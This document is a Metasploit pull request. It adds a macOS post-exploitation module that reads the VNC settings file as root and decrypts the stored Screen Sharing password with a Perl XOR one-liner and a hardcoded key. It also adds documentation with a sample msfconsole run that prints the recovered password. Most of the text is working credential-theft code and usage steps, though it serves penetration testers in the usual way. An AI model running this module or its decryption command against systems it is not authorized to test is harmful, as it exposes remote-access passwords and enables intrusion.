### PR TITLE
Display Apple VNC Password (OSX)

### DIFF
--- a/documentation/modules/post/osx/gather/vnc_password_osx.md
+++ b/documentation/modules/post/osx/gather/vnc_password_osx.md
@@ -10,7 +10,7 @@ This module show Apple VNC Password from Mac OS X High Sierra.
   Example steps in this format (is also in the PR):
 
   1. Start `msfconsole`
-  2. Do: `osx/gather/vnc_password_osx`
+  2. Do: `post/osx/gather/vnc_password_osx`
   3. Do: set the `SESSION [ID]`
   4. Do: ```run```
   5. You should get the password
@@ -21,7 +21,7 @@ This module show Apple VNC Password from Mac OS X High Sierra.
   Typical run against an OSX session, with the vnc service activated:
 
 ```
-msf5 exploit(multi/handler) > use osx/gather/vnc_password_osx
+msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx
 msf5 post(osx/gather/vnc_password_osx) > set SESSION 1
 SESSION => 1
 msf5 post(osx/gather/vnc_password_osx) > exploit

--- a/documentation/modules/post/osx/gather/vnc_password_osx.md
+++ b/documentation/modules/post/osx/gather/vnc_password_osx.md
@@ -5,7 +5,7 @@ System Preferences > Sharing > Screen Sharing > Computer Settings
 
 ## Vulnerable Application
 
-  * macOS 10.13.6*
+  * macOS 10.13.6
 
 
 ## Verification Steps
@@ -13,10 +13,11 @@ System Preferences > Sharing > Screen Sharing > Computer Settings
   Example steps in this format (is also in the PR):
 
   1. Start `msfconsole`
-  2. Do: `post/osx/gather/vnc_password_osx`
-  3. Do: set the `SESSION [ID]`
-  4. Do: ```run```
-  5. You should get the password
+  2. Get an OSX meterpreter session running as root
+  3. Do: `use post/osx/gather/vnc_password_osx`
+  4. Do: `set SESSION [ID]`
+  5. Do: `run`
+  6. You should see the password
 
 
 ## Scenarios
@@ -29,10 +30,9 @@ msf5 post(osx/gather/vnc_password_osx) > set SESSION 1
 SESSION => 1
 msf5 post(osx/gather/vnc_password_osx) > exploit
 
-[*] Running module against MacBook-Pro.local
-[*] This session is running as root!
 [*] Checking VNC Password...
 [+] Password Found: PoCpassw
+[+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt
 [*] Post module execution completed
 msf5 post(osx/gather/vnc_password_osx) >
 ```

--- a/documentation/modules/post/osx/gather/vnc_password_osx.md
+++ b/documentation/modules/post/osx/gather/vnc_password_osx.md
@@ -1,4 +1,7 @@
-This module show Apple VNC Password from Mac OS X High Sierra.
+This module shows Apple VNC Password from Mac OS X High Sierra.
+
+The password can be set by visiting:
+System Preferences > Sharing > Screen Sharing > Computer Settings
 
 ## Vulnerable Application
 

--- a/documentation/modules/post/osx/gather/vnc_password_osx.md
+++ b/documentation/modules/post/osx/gather/vnc_password_osx.md
@@ -1,0 +1,35 @@
+This module show Apple VNC Password from Mac OS X High Sierra.
+
+## Vulnerable Application
+
+  * macOS 10.13.6*
+
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Start `msfconsole`
+  2. Do: `osx/gather/vnc_password_osx`
+  3. Do: set the `SESSION [ID]`
+  4. Do: ```run```
+  5. You should get the password
+
+
+## Scenarios
+
+  Typical run against an OSX session, with the vnc service activated:
+
+```
+msf5 exploit(multi/handler) > use osx/gather/vnc_password_osx
+msf5 post(osx/gather/vnc_password_osx) > set SESSION 1
+SESSION => 1
+msf5 post(osx/gather/vnc_password_osx) > exploit
+
+[*] Running module against MacBook-Pro.local
+[*] This session is running as root!
+[*] Checking VNC Password...
+[+] Password Found: PoCpassw
+[*] Post module execution completed
+msf5 post(osx/gather/vnc_password_osx) >
+```

--- a/modules/post/osx/gather/vnc_password_osx.rb
+++ b/modules/post/osx/gather/vnc_password_osx.rb
@@ -1,0 +1,50 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/report'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'OS X Display Apple VNC Password',
+        'Description'   => %q{
+            This module show Apple VNC Password from Mac OS X High Sierra.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Kevin Gonzalvo <interhack[at]gmail.com>'],
+        'Platform'      => [ 'osx' ],
+        'SessionTypes'  => [ "meterpreter", "shell" ]
+      ))
+
+  end
+
+  def run
+    case session.type
+    when /meterpreter/
+      host = sysinfo["Computer"]
+    when /shell/
+      host = cmd_exec("hostname")
+    end
+
+    print_status("Running module against #{host}")
+
+    if is_root?
+      print_status("This session is running as root!")
+      print_status("Checking VNC Password...")
+      exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;")
+      if exist == '1'
+        print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'"))
+      else
+        print_error("The VNC Password has not been found")
+      end
+    else
+      print_error("It is necessary to be root!")
+    end
+  end
+end

--- a/modules/post/osx/gather/vnc_password_osx.rb
+++ b/modules/post/osx/gather/vnc_password_osx.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
     return str
   end
 
-  def getFile(filename)
+  def get_file(filename)
     begin
       client.fs.file.stat(filename)
       config = client.fs.file.new(filename,'r')
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Post
     print_status("This session is running as root!")
     print_status("Checking VNC Password...")
     vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
-    passwd_encrypt = getFile("#{vncsettings_path}")
+    passwd_encrypt = get_file("#{vncsettings_path}")
     final_passwd = decrypt_hash("#{passwd_encrypt}")
     if !final_passwd.nil?
       print_good("Password Found: #{final_passwd}")

--- a/modules/post/osx/gather/vnc_password_osx.rb
+++ b/modules/post/osx/gather/vnc_password_osx.rb
@@ -6,9 +6,7 @@
 require 'msf/core/auxiliary/report'
 
 class MetasploitModule < Msf::Post
-  include Msf::Post::File
   include Msf::Post::OSX::Priv
-  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super( update_info( info,

--- a/modules/post/osx/gather/vnc_password_osx.rb
+++ b/modules/post/osx/gather/vnc_password_osx.rb
@@ -7,6 +7,7 @@ require 'msf/core/auxiliary/report'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::OSX::Priv
+  include Msf::Post::File
 
   def initialize(info={})
     super( update_info( info,
@@ -31,18 +32,19 @@ class MetasploitModule < Msf::Post
     end
 
     print_status("Running module against #{host}")
+    
+    unless is_root?
+      fail_with(Failure::NoAccess, 'It is necessary to be root!')
+    end
+    print_status("This session is running as root!")
 
-    if is_root?
-      print_status("This session is running as root!")
-      print_status("Checking VNC Password...")
-      exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;")
-      if exist == '1'
-        print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'"))
-      else
-        print_error("The VNC Password has not been found")
-      end
+    print_status("Checking VNC Password...")
+    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
+    if file_exist? vncsettings_path
+      password = cmd_exec("cat #{vncsettings_path} | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'")
+      print_good("Password Found: #{password}")
     else
-      print_error("It is necessary to be root!")
+      print_error("The VNC Password has not been found")
     end
   end
 end

--- a/modules/post/osx/gather/vnc_password_osx.rb
+++ b/modules/post/osx/gather/vnc_password_osx.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Post
     end
 
     print_status("Running module against #{host}")
-    
+
     unless is_root?
       fail_with(Failure::NoAccess, 'It is necessary to be root!')
     end


### PR DESCRIPTION
This module show Apple VNC Password from Mac OS X High Sierra.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a `shell` or `meterpreter` session on some host.
- [ ] `use osx/gather/vnc_password_osx`
- [ ] ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
- [ ] `run`
- [ ] **Verify** If the system has a VNC file, the VNC password will be obtained.
- [ ] **Verify** If you do not have the file, or you are not root, you will not get the password
